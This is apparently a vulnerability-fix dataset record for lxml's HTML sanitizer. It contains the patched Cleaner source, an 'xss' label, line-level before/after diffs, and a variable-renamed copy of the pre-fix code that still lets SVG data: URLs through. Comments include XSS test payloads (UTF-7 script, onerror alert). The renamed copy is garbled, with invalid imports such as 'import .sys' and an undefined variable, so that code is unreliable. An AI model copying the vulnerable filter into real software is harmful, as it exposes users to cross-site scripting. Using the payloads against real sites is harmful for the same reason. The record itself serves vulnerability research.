# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
_replace_css_javascript = re.compile(
r'expression\s*\(.*?\)', re.S|re.I).sub
# Do I have to worry about @\nimport?
_replace_css_import = re.compile(
r'@\s*import', re.I).sub
_looks_like_tag_content = re.compile(
r'</?[a-zA-Z]+|\son[a-zA-Z]+\s*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
# All kinds of schemes besides just javascript: that can cause
# execution:
_find_image_dataurls = re.compile(
r'^data:image/(.+);base64,', re.I).findall
_is_possibly_malicious_scheme = re.compile(
r'(javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).findall
# SVG images can contain script content
_is_unsafe_image_type = re.compile(r"(xml|svg)", re.I).findall
def _is_javascript_scheme(s):
is_image_url = False
for image_type in _find_image_dataurls(s):
is_image_url = True
if _is_unsafe_image_type(image_type):
return True
if is_image_url:
return False
return bool(_is_possibly_malicious_scheme(s))
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub
# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx
_conditional_comment_re = re.compile(
r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)
_find_styled_elements = etree.XPath(
"descendant-or-self::*[@style]")
_find_external_links = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
    """
    Instances cleans the document of each of the possible offending
    elements. The cleaning is controlled by attributes; you can
    override attributes in a subclass, or set them in the constructor.
    ``scripts``:
        Removes any ``<script>`` tags.
    ``javascript``:
        Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
        as they could contain Javascript.
    ``comments``:
        Removes any comments.
    ``style``:
        Removes any style tags.
    ``inline_style``
        Removes any style attributes. Defaults to the value of the ``style`` option.
    ``links``:
        Removes any ``<link>`` tags
    ``meta``:
        Removes any ``<meta>`` tags
    ``page_structure``:
        Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.
    ``processing_instructions``:
        Removes any processing instructions.
    ``embedded``:
        Removes any embedded objects (flash, iframes)
    ``frames``:
        Removes any frame-related tags
    ``forms``:
        Removes any form tags
    ``annoying_tags``:
        Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marquee>``
    ``remove_tags``:
        A list of tags to remove. Only the tags will be removed,
        their content will get pulled up into the parent tag.
    ``kill_tags``:
        A list of tags to kill. Killing also removes the tag's content,
        i.e. the whole subtree, not just the tag itself.
    ``allow_tags``:
        A list of tags to include (default include all).
    ``remove_unknown_tags``:
        Remove any tags that aren't standard parts of HTML.
    ``safe_attrs_only``:
        If true, only include 'safe' attributes (specifically the list
        from the feedparser HTML sanitisation web site).
    ``safe_attrs``:
        A set of attribute names to override the default list of attributes
        considered 'safe' (when safe_attrs_only=True).
    ``add_nofollow``:
        If true, then any <a> tags will have ``rel="nofollow"`` added to them.
    ``host_whitelist``:
        A list or set of hosts that you can use for embedded content
        (for content like ``<object>``, ``<link rel="stylesheet">``, etc).
        You can also implement/override the method
        ``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
        implement more complex rules for what can be embedded.
        Anything that passes this test will be shown, regardless of
        the value of (for instance) ``embedded``.
        Note that this parameter might not work as intended if you do not
        make the links absolute before doing the cleaning.
        Note that you may also need to set ``whitelist_tags``.
    ``whitelist_tags``:
        A set of tags that can be included with ``host_whitelist``.
        The default is ``iframe`` and ``embed``; you may wish to
        include other tags like ``script``, or you may want to
        implement ``allow_embedded_url`` for more control. Set to None to
        include all tags.
    This modifies the document *in place*.
    """
    scripts = True
    javascript = True
    comments = True
    style = False
    inline_style = None
    links = True
    meta = True
    page_structure = True
    processing_instructions = True
    embedded = True
    frames = True
    forms = True
    annoying_tags = True
    remove_tags = None
    allow_tags = None
    kill_tags = None
    remove_unknown_tags = True
    safe_attrs_only = True
    safe_attrs = defs.safe_attrs
    add_nofollow = False
    host_whitelist = ()
    whitelist_tags = {'iframe', 'embed'}
    def __init__(self, **kw):
        """
        Configure the cleaner.  Any of the class attributes documented
        above may be overridden via keyword arguments; unknown names
        raise TypeError.
        """
        not_an_attribute = object()
        for name, value in kw.items():
            default = getattr(self, name, not_an_attribute)
            if (default is not None and default is not True and default is not False
                    and not isinstance(default, (frozenset, set, tuple, list))):
                raise TypeError(
                    "Unknown parameter: %s=%r" % (name, value))
            setattr(self, name, value)
        # ``inline_style`` tracks ``style`` unless set explicitly.
        if self.inline_style is None and 'inline_style' not in kw:
            self.inline_style = self.style
        if kw.get("allow_tags"):
            if kw.get("remove_unknown_tags"):
                raise ValueError("It does not make sense to pass in both "
                                 "allow_tags and remove_unknown_tags")
            self.remove_unknown_tags = False
    # Used to lookup the primary URL for a given tag that is up for
    # removal:
    _tag_link_attrs = dict(
        script='src',
        link='href',
        # From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
        # From what I can tell, both attributes can contain a link:
        applet=['code', 'object'],
        iframe='src',
        embed='src',
        layer='src',
        # FIXME: there doesn't really seem like a general way to figure out what
        # links an <object> tag uses; links often go in <param> tags with values
        # that we don't really know. You'd have to have knowledge about specific
        # kinds of plugins (probably keyed off classid), and match against those.
        ##object=?,
        # FIXME: not looking at the action currently, because it is more complex
        # than than -- if you keep the form, you should keep the form controls.
        ##form='action',
        a='href',
        )
    def __call__(self, doc):
        """
        Cleans the document.
        """
        try:
            getroot = doc.getroot
        except AttributeError:
            pass # Element instance
        else:
            doc = getroot() # ElementTree instance, instead of an element
        # convert XHTML to HTML
        xhtml_to_html(doc)
        # Normalize a case that IE treats <image> like <img>, and that
        # can confuse either this step or later steps.
        for el in doc.iter('image'):
            el.tag = 'img'
        if not self.comments:
            # Of course, if we were going to kill comments anyway, we don't
            # need to worry about this
            self.kill_conditional_comments(doc)
        # Start from the user-configured tag sets; the option checks
        # below add to them.
        kill_tags = set(self.kill_tags or ())
        remove_tags = set(self.remove_tags or ())
        allow_tags = set(self.allow_tags or ())
        if self.scripts:
            kill_tags.add('script')
        if self.safe_attrs_only:
            safe_attrs = set(self.safe_attrs)
            for el in doc.iter(etree.Element):
                attrib = el.attrib
                for aname in attrib.keys():
                    if aname not in safe_attrs:
                        del attrib[aname]
        if self.javascript:
            if not (self.safe_attrs_only and
                    self.safe_attrs == defs.safe_attrs):
                # safe_attrs handles events attributes itself
                for el in doc.iter(etree.Element):
                    attrib = el.attrib
                    for aname in attrib.keys():
                        if aname.startswith('on'):
                            del attrib[aname]
            doc.rewrite_links(self._remove_javascript_link,
                              resolve_base_href=False)
            # If we're deleting style then we don't have to remove JS links
            # from styles, otherwise...
            if not self.inline_style:
                for el in _find_styled_elements(doc):
                    old = el.get('style')
                    new = _replace_css_javascript('', old)
                    new = _replace_css_import('', new)
                    if self._has_sneaky_javascript(new):
                        # Something tricky is going on...
                        del el.attrib['style']
                    elif new != old:
                        el.set('style', new)
            if not self.style:
                for el in list(doc.iter('style')):
                    if el.get('type', '').lower().strip() == 'text/javascript':
                        el.drop_tree()
                        continue
                    old = el.text or ''
                    new = _replace_css_javascript('', old)
                    # The imported CSS can do anything; we just can't allow:
                    new = _replace_css_import('', new)
                    if self._has_sneaky_javascript(new):
                        # Something tricky is going on...
                        el.text = '/* deleted */'
                    elif new != old:
                        el.text = new
        if self.comments:
            kill_tags.add(etree.Comment)
        if self.processing_instructions:
            kill_tags.add(etree.ProcessingInstruction)
        if self.style:
            kill_tags.add('style')
        if self.inline_style:
            etree.strip_attributes(doc, 'style')
        if self.links:
            kill_tags.add('link')
        elif self.style or self.javascript:
            # We must get rid of included stylesheets if Javascript is not
            # allowed, as you can put Javascript in them
            for el in list(doc.iter('link')):
                if 'stylesheet' in el.get('rel', '').lower():
                    # Note this kills alternate stylesheets as well
                    if not self.allow_element(el):
                        el.drop_tree()
        if self.meta:
            kill_tags.add('meta')
        if self.page_structure:
            remove_tags.update(('head', 'html', 'title'))
        if self.embedded:
            # FIXME: is <layer> really embedded?
            # We should get rid of any <param> tags not inside <applet>;
            # These are not really valid anyway.
            for el in list(doc.iter('param')):
                parent = el.getparent()
                while parent is not None and parent.tag not in ('applet', 'object'):
                    parent = parent.getparent()
                if parent is None:
                    el.drop_tree()
            kill_tags.update(('applet',))
            # The alternate contents that are in an iframe are a good fallback:
            remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
        if self.frames:
            # FIXME: ideally we should look at the frame links, but
            # generally frames don't mix properly with an HTML
            # fragment anyway.
            kill_tags.update(defs.frame_tags)
        if self.forms:
            remove_tags.add('form')
            kill_tags.update(('button', 'input', 'select', 'textarea'))
        if self.annoying_tags:
            remove_tags.update(('blink', 'marquee'))
        # Collect the elements first and drop them afterwards, so we
        # never mutate the tree while iterating over it.
        _remove = []
        _kill = []
        for el in doc.iter():
            if el.tag in kill_tags:
                if self.allow_element(el):
                    continue
                _kill.append(el)
            elif el.tag in remove_tags:
                if self.allow_element(el):
                    continue
                _remove.append(el)
        if _remove and _remove[0] == doc:
            # We have to drop the parent-most tag, which we can't
            # do. Instead we'll rewrite it:
            el = _remove.pop(0)
            el.tag = 'div'
            el.attrib.clear()
        elif _kill and _kill[0] == doc:
            # We have to drop the parent-most element, which we can't
            # do. Instead we'll clear it:
            el = _kill.pop(0)
            if el.tag != 'html':
                el.tag = 'div'
            el.clear()
        _kill.reverse() # start with innermost tags
        for el in _kill:
            el.drop_tree()
        for el in _remove:
            el.drop_tag()
        if self.remove_unknown_tags:
            if allow_tags:
                raise ValueError(
                    "It does not make sense to pass in both allow_tags and remove_unknown_tags")
            allow_tags = set(defs.tags)
        if allow_tags:
            # make sure we do not remove comments/PIs if users want them (which is rare enough)
            if not self.comments:
                allow_tags.add(etree.Comment)
            if not self.processing_instructions:
                allow_tags.add(etree.ProcessingInstruction)
            bad = []
            for el in doc.iter():
                if el.tag not in allow_tags:
                    bad.append(el)
            if bad:
                if bad[0] is doc:
                    el = bad.pop(0)
                    el.tag = 'div'
                    el.attrib.clear()
                for el in bad:
                    el.drop_tag()
        if self.add_nofollow:
            for el in _find_external_links(doc):
                if not self.allow_follow(el):
                    rel = el.get('rel')
                    if rel:
                        if ('nofollow' in rel
                                and ' nofollow ' in (' %s ' % rel)):
                            continue
                        rel = '%s nofollow' % rel
                    else:
                        rel = 'nofollow'
                    el.set('rel', rel)
    def allow_follow(self, anchor):
        """
        Override to suppress rel="nofollow" on some anchors.
        """
        return False
    def allow_element(self, el):
        """
        Decide whether an element is configured to be accepted or rejected.
        :param el: an element.
        :return: true to accept the element or false to reject/discard it.
        """
        if el.tag not in self._tag_link_attrs:
            return False
        attr = self._tag_link_attrs[el.tag]
        if isinstance(attr, (list, tuple)):
            # Every link-carrying attribute must be present and allowed.
            for one_attr in attr:
                url = el.get(one_attr)
                if not url:
                    return False
                if not self.allow_embedded_url(el, url):
                    return False
            return True
        else:
            url = el.get(attr)
            if not url:
                return False
            return self.allow_embedded_url(el, url)
    def allow_embedded_url(self, el, url):
        """
        Decide whether a URL that was found in an element's attributes or text
        if configured to be accepted or rejected.
        :param el: an element.
        :param url: a URL found on the element.
        :return: true to accept the URL and false to reject it.
        """
        if self.whitelist_tags is not None and el.tag not in self.whitelist_tags:
            return False
        scheme, netloc, path, query, fragment = urlsplit(url)
        # Strip any port before comparing against host_whitelist.
        netloc = netloc.lower().split(':', 1)[0]
        if scheme not in ('http', 'https'):
            return False
        if netloc in self.host_whitelist:
            return True
        return False
    def kill_conditional_comments(self, doc):
        """
        IE conditional comments basically embed HTML that the parser
        doesn't normally see. We can't allow anything like that, so
        we'll kill any comments that could be conditional.
        """
        has_conditional_comment = _conditional_comment_re.search
        self._kill_elements(
            doc, lambda el: has_conditional_comment(el.text),
            etree.Comment)
    def _kill_elements(self, doc, condition, iterate=None):
        # Drop (with subtree) every element for which condition(el) is true.
        bad = []
        for el in doc.iter(iterate):
            if condition(el):
                bad.append(el)
        for el in bad:
            el.drop_tree()
    def _remove_javascript_link(self, link):
        # links like "j a v a s c r i p t:" might be interpreted in IE
        new = _substitute_whitespace('', unquote_plus(link))
        if _is_javascript_scheme(new):
            # FIXME: should this be None to delete?
            return ''
        return link
    _substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub
    def _has_sneaky_javascript(self, style):
        """
        Depending on the browser, stuff like ``e x p r e s s i o n(...)``
        can get interpreted, or ``expre/* stuff */ssion(...)``. This
        checks for attempt to do stuff like this.
        Typically the response will be to kill the entire style; if you
        have just a bit of Javascript in the style another rule will catch
        that and remove only the Javascript from the style; this catches
        more sneaky attempts.
        """
        style = self._substitute_comments('', style)
        style = style.replace('\\', '')
        style = _substitute_whitespace('', style)
        style = style.lower()
        if 'javascript:' in style:
            return True
        if 'expression(' in style:
            return True
        if '@import' in style:
            return True
        if '</noscript' in style:
            # e.g. '<noscript><style><a title="</noscript><img src=x onerror=alert(1)>">'
            return True
        if _looks_like_tag_content(style):
            # e.g. '<math><style><img src=x onerror=alert(1)></style></math>'
            return True
        return False
    def clean_html(self, html):
        """
        Clean *html* and return the result as the same type that was
        passed in (markup string/bytes, or parsed document/element).
        """
        result_type = type(html)
        if isinstance(html, basestring):
            doc = fromstring(html)
        else:
            doc = copy.deepcopy(html)
        self(doc)
        return _transform_result(result_type, doc)
clean = Cleaner()
clean_html = clean.clean_html
############################################################
## Autolinking
############################################################
_link_regexes = [
re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
# This is conservative, but autolinking can be a bit conservative:
re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
]
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']
_avoid_hosts = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
             avoid_elements=_avoid_elements,
             avoid_hosts=_avoid_hosts,
             avoid_classes=_avoid_classes):
    """
    Turn any URLs into links.
    It will search for links identified by the given regular
    expressions (by default mailto and http(s) links).
    It won't link text in an element in avoid_elements, or an element
    with a class in avoid_classes. It won't link to anything with a
    host that matches one of the regular expressions in avoid_hosts
    (default localhost and 127.0.0.1).
    If you pass in an element, the element's tail will not be
    substituted, only the contents of the element.
    """
    if el.tag in avoid_elements:
        return
    class_name = el.get('class')
    if class_name:
        class_name = class_name.split()
        for match_class in avoid_classes:
            if match_class in class_name:
                return
    # Iterate over a snapshot of the children: linking a child's tail
    # inserts new <a> siblings into ``el`` right after that child.
    for child in list(el):
        autolink(child, link_regexes=link_regexes,
                 avoid_elements=avoid_elements,
                 avoid_hosts=avoid_hosts,
                 avoid_classes=avoid_classes)
        if child.tail:
            text, tail_children = _link_text(
                child.tail, link_regexes, avoid_hosts, factory=el.makeelement)
            if tail_children:
                child.tail = text
                index = el.index(child)
                el[index+1:index+1] = tail_children
    # Finally link the element's own leading text, prepending any new
    # anchors before the existing children.
    if el.text:
        text, pre_children = _link_text(
            el.text, link_regexes, avoid_hosts, factory=el.makeelement)
        if pre_children:
            el.text = text
            el[:0] = pre_children
def _link_text(text, link_regexes, avoid_hosts, factory):
    """
    Find links in *text* and return ``(leading_text, links)``.
    *links* is a list of ``<a>`` elements created with *factory*, each
    carrying the plain text that follows it in its ``tail``;
    *leading_text* is the text before the first link (all of *text*
    when nothing matched).  Matches whose ``host`` group matches one of
    *avoid_hosts* are skipped.
    """
    leading_text = ''
    links = []
    last_pos = 0
    while 1:
        best_match, best_pos = None, None
        # Of all regexes, pick the match that starts earliest in text.
        for regex in link_regexes:
            regex_pos = last_pos
            while 1:
                match = regex.search(text, pos=regex_pos)
                if match is None:
                    break
                host = match.group('host')
                # for/else: the outer "break" below is only reached when
                # no avoid_hosts pattern matched; otherwise retry the
                # search past this (avoided) match.
                for host_regex in avoid_hosts:
                    if host_regex.search(host):
                        regex_pos = match.end()
                        break
                else:
                    break
            if match is None:
                continue
            if best_pos is None or match.start() < best_pos:
                best_match = match
                best_pos = match.start()
        if best_match is None:
            # No more matches
            if links:
                assert not links[-1].tail
                links[-1].tail = text
            else:
                assert not leading_text
                leading_text = text
            break
        link = best_match.group(0)
        end = best_match.end()
        if link.endswith('.') or link.endswith(','):
            # These punctuation marks shouldn't end a link
            end -= 1
            link = link[:-1]
        prev_text = text[:best_match.start()]
        if links:
            assert not links[-1].tail
            links[-1].tail = prev_text
        else:
            assert not leading_text
            leading_text = prev_text
        anchor = factory('a')
        anchor.set('href', link)
        body = best_match.group('body')
        if not body:
            body = link
        if body.endswith('.') or body.endswith(','):
            body = body[:-1]
        anchor.text = body
        links.append(anchor)
        # Continue scanning after the consumed match.
        text = text[end:]
    return leading_text, links
def autolink_html(html, *args, **kw):
    # String/bytes input is parsed; element input is deep-copied so the
    # caller's tree is left untouched.  The result comes back as the
    # same type that was passed in.
    result_type = type(html)
    if isinstance(html, basestring):
        tree = fromstring(html)
    else:
        tree = copy.deepcopy(html)
    autolink(tree, *args, **kw)
    return _transform_result(result_type, tree)
autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################
_avoid_word_break_elements = ['pre', 'textarea', 'code']
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
               avoid_elements=_avoid_word_break_elements,
               avoid_classes=_avoid_word_break_classes,
               break_character=unichr(0x200b)):
    """
    Breaks any long words found in the body of the text (not attributes).

    Doesn't affect any of the tags in ``avoid_elements``, by default
    ``<textarea>``, ``<pre>`` and ``<code>``, nor elements carrying one
    of the classes in ``avoid_classes`` (default ``nobreak``).

    Breaks words by inserting &#8203;, which is a unicode character
    for Zero Width Space character. This generally takes up no space
    in rendering, but does copy as a space, and in monospace contexts
    usually takes up space.

    See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion
    """
    # Character suggestion of &#8203; comes from:
    # http://www.cs.tut.fi/~jkorpela/html/nobr.html
    #
    # Bug fix: consult the ``avoid_elements`` argument here.  Previously
    # the module-level default list was tested regardless of what the
    # caller passed in, so a custom avoid_elements was silently ignored.
    if el.tag in avoid_elements:
        return
    class_name = el.get('class')
    if class_name:
        # Skip this element entirely if it carries an avoided class.
        class_names = class_name.split()
        for avoid in avoid_classes:
            if avoid in class_names:
                return
    if el.text:
        el.text = _break_text(el.text, max_width, break_character)
    for child in el:
        word_break(child, max_width=max_width,
                   avoid_elements=avoid_elements,
                   avoid_classes=avoid_classes,
                   break_character=break_character)
        if child.tail:
            child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
    """Parse *html*, insert word-break points via :func:`word_break`,
    and return the result as the original input type."""
    result_type = type(html)
    root = fromstring(html)
    word_break(root, *args, **kw)
    return _transform_result(result_type, root)
def _break_text(text, max_width, break_character):
    # Any whitespace-delimited chunk longer than max_width gets break
    # characters inserted via _insert_break; shorter chunks pass through.
    long_words = [w for w in text.split() if len(w) > max_width]
    for word in long_words:
        text = text.replace(word, _insert_break(word, max_width, break_character))
    return text
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
orig_word = word
result = ''
while len(word) > width:
start = word[:width]
breaks = list(_break_prefer_re.finditer(start))
if breaks:
last_break = breaks[-1]
# Only walk back up to 10 characters to find a nice break:
if last_break.end() > width-10:
# FIXME: should the break character be at the end of the
# chunk, or the beginning of the next chunk?
start = word[:last_break.end()]
result += start + break_character
word = word[len(start):]
result += word
return result
| xss | {
"code": [
"_is_image_dataurl = re.compile(",
" r'^data:image/.+;base64', re.I).search",
" r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',",
" re.I).search",
" if _is_image_dataurl(s):",
" return None",
" return _is_possibly_malicious_scheme(s)"
],
"line_no": [
78,
79,
81,
82,
84,
85,
86
]
} | {
"code": [
"_find_image_dataurls = re.compile(",
" r'^data:image/(.+);base64,', re.I).findall",
" r'(javascript|jscript|livescript|vbscript|data|about|mocha):',",
" re.I).findall",
"_is_unsafe_image_type = re.compile(r\"(xml|svg)\", re.I).findall",
" for image_type in _find_image_dataurls(s):",
" if _is_unsafe_image_type(image_type):",
" if is_image_url:",
" return False"
],
"line_no": [
78,
79,
81,
82,
84,
88,
90,
92,
93
]
} |
from __future__ import absolute_import
import copy
import re
import .sys
try:
from urlparse import .urlsplit
from urllib import unquote_plus
except ImportError:
from urllib.parse import .urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_70
except NameError:
VAR_70 = chr
try:
VAR_71
except NameError:
VAR_71 = str
try:
VAR_72
except NameError:
VAR_72 = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_5*\(.*?\)', re.S|re.I).sub
VAR_1 = re.compile(
r'@\VAR_5*import', re.I).sub
VAR_2 = re.compile(
r'</?[a-zA-Z]+|\son[a-zA-Z]+\VAR_5*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
VAR_3 = re.compile(
r'^data:image/.+;base64', re.I).search
VAR_4 = re.compile(
r'(?:VAR_34|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def FUNC_0(VAR_5):
if VAR_3(VAR_5):
return None
return VAR_4(VAR_5)
VAR_6 = re.compile(r'[\VAR_5\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_7 = re.compile(
r'\[if[\VAR_5\n\r]+.*?][\VAR_5\n\r]*>', re.I|re.S)
VAR_8 = etree.XPath(
"descendant-or-self::*[@VAR_36]")
VAR_9 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_33 = True
VAR_34 = True
VAR_35 = True
VAR_36 = False
VAR_37 = None
VAR_38 = True
VAR_39 = True
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = True
VAR_46 = None
VAR_47 = None
VAR_48 = None
VAR_49 = True
VAR_50 = True
VAR_51 = defs.safe_attrs
VAR_52 = False
VAR_53 = ()
VAR_54 = {'iframe', 'embed'}
def __init__(self, **VAR_25):
VAR_73 = object()
for name, value in VAR_25.items():
VAR_94 = getattr(self, name, VAR_73)
if (VAR_94 is not None and VAR_94 is not True and VAR_94 is not False
and not isinstance(VAR_94, (frozenset, set, tuple, list))):
raise TypeError(
"Unknown parameter: %VAR_5=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_25:
self.inline_style = self.style
if VAR_25.get("allow_tags"):
if VAR_25.get("remove_unknown_tags"):
raise ValueError("It does not make sense to pass in both "
"allow_tags and remove_unknown_tags")
self.remove_unknown_tags = False
VAR_55 = dict(
script='src',
VAR_61='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_56):
try:
VAR_95 = VAR_56.getroot
except AttributeError:
pass # Element instance
else:
VAR_56 = VAR_95() # ElementTree instance, instead of an element
xhtml_to_html(VAR_56)
for VAR_16 in VAR_56.iter('image'):
VAR_16.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_56)
VAR_48 = set(self.kill_tags or ())
VAR_46 = set(self.remove_tags or ())
VAR_47 = set(self.allow_tags or ())
if self.scripts:
VAR_48.add('script')
if self.safe_attrs_only:
VAR_51 = set(self.safe_attrs)
for VAR_16 in VAR_56.iter(etree.Element):
VAR_100 = VAR_16.attrib
for aname in VAR_100.keys():
if aname not in VAR_51:
del VAR_100[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_16 in VAR_56.iter(etree.Element):
VAR_100 = VAR_16.attrib
for aname in VAR_100.keys():
if aname.startswith('on'):
del VAR_100[aname]
VAR_56.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_16 in VAR_8(VAR_56):
VAR_105 = VAR_16.get('style')
VAR_84 = VAR_0('', VAR_105)
VAR_84 = VAR_1('', VAR_84)
if self._has_sneaky_javascript(VAR_84):
del VAR_16.attrib['style']
elif VAR_84 != VAR_105:
VAR_16.set('style', VAR_84)
if not self.style:
for VAR_16 in list(VAR_56.iter('style')):
if VAR_16.get('type', '').lower().strip() == 'text/javascript':
VAR_16.drop_tree()
continue
VAR_105 = VAR_16.text or ''
VAR_84 = VAR_0('', VAR_105)
VAR_84 = VAR_1('', VAR_84)
if self._has_sneaky_javascript(VAR_84):
VAR_16.text = '/* deleted */'
elif VAR_84 != VAR_105:
VAR_16.text = VAR_84
if self.comments:
VAR_48.add(etree.Comment)
if self.processing_instructions:
VAR_48.add(etree.ProcessingInstruction)
if self.style:
VAR_48.add('style')
if self.inline_style:
etree.strip_attributes(VAR_56, 'style')
if self.links:
VAR_48.add('link')
elif self.style or self.javascript:
for VAR_16 in list(VAR_56.iter('link')):
if 'stylesheet' in VAR_16.get('rel', '').lower():
if not self.allow_element(VAR_16):
VAR_16.drop_tree()
if self.meta:
VAR_48.add('meta')
if self.page_structure:
VAR_46.update(('head', 'html', 'title'))
if self.embedded:
for VAR_16 in list(VAR_56.iter('param')):
VAR_101 = VAR_16.getparent()
while VAR_101 is not None and VAR_101.tag not in ('applet', 'object'):
VAR_101 = VAR_101.getparent()
if VAR_101 is None:
VAR_16.drop_tree()
VAR_48.update(('applet',))
VAR_46.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_48.update(defs.frame_tags)
if self.forms:
VAR_46.add('form')
VAR_48.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_46.update(('blink', 'marquee'))
VAR_74 = []
VAR_75 = []
for VAR_16 in VAR_56.iter():
if VAR_16.tag in VAR_48:
if self.allow_element(VAR_16):
continue
VAR_75.append(VAR_16)
elif VAR_16.tag in VAR_46:
if self.allow_element(VAR_16):
continue
VAR_74.append(VAR_16)
if VAR_74 and VAR_74[0] == VAR_56:
VAR_16 = VAR_74.pop(0)
VAR_16.tag = 'div'
VAR_16.attrib.clear()
elif VAR_75 and VAR_75[0] == VAR_56:
VAR_16 = VAR_75.pop(0)
if VAR_16.tag != 'html':
VAR_16.tag = 'div'
VAR_16.clear()
VAR_75.reverse() # VAR_92 with innermost tags
for VAR_16 in VAR_75:
VAR_16.drop_tree()
for VAR_16 in VAR_74:
VAR_16.drop_tag()
if self.remove_unknown_tags:
if VAR_47:
raise ValueError(
"It does not make sense to pass in both VAR_47 and remove_unknown_tags")
VAR_47 = set(defs.tags)
if VAR_47:
if not self.comments:
VAR_47.add(etree.Comment)
if not self.processing_instructions:
VAR_47.add(etree.ProcessingInstruction)
VAR_83 = []
for VAR_16 in VAR_56.iter():
if VAR_16.tag not in VAR_47:
VAR_83.append(VAR_16)
if VAR_83:
if VAR_83[0] is VAR_56:
VAR_16 = VAR_83.pop(0)
VAR_16.tag = 'div'
VAR_16.attrib.clear()
for VAR_16 in VAR_83:
VAR_16.drop_tag()
if self.add_nofollow:
for VAR_16 in VAR_9(VAR_56):
if not self.allow_follow(VAR_16):
VAR_106 = VAR_16.get('rel')
if VAR_106:
if ('nofollow' in VAR_106
and ' nofollow ' in (' %VAR_5 ' % VAR_106)):
continue
VAR_106 = '%VAR_5 nofollow' % VAR_106
else:
VAR_106 = 'nofollow'
VAR_16.set('rel', VAR_106)
def FUNC_8(self, VAR_57):
return False
def FUNC_9(self, VAR_16):
if VAR_16.tag not in self._tag_link_attrs:
return False
VAR_76 = self._tag_link_attrs[VAR_16.tag]
if isinstance(VAR_76, (list, tuple)):
for one_attr in VAR_76:
VAR_58 = VAR_16.get(one_attr)
if not VAR_58:
return False
if not self.allow_embedded_url(VAR_16, VAR_58):
return False
return True
else:
VAR_58 = VAR_16.get(VAR_76)
if not VAR_58:
return False
return self.allow_embedded_url(VAR_16, VAR_58)
def FUNC_10(self, VAR_16, VAR_58):
if self.whitelist_tags is not None and VAR_16.tag not in self.whitelist_tags:
return False
VAR_77, VAR_78, VAR_79, VAR_80, VAR_81 = urlsplit(VAR_58)
VAR_78 = netloc.lower().split(':', 1)[0]
if VAR_77 not in ('http', 'https'):
return False
if VAR_78 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_56):
VAR_82 = VAR_7.search
self._kill_elements(
VAR_56, lambda VAR_16: VAR_82(VAR_16.text),
etree.Comment)
def FUNC_12(self, VAR_56, VAR_59, VAR_60=None):
VAR_83 = []
for VAR_16 in VAR_56.iter(VAR_60):
if VAR_59(VAR_16):
VAR_83.append(VAR_16)
for VAR_16 in VAR_83:
VAR_16.drop_tree()
def FUNC_13(self, VAR_61):
VAR_84 = VAR_6('', unquote_plus(VAR_61))
if FUNC_0(VAR_84):
return ''
return VAR_61
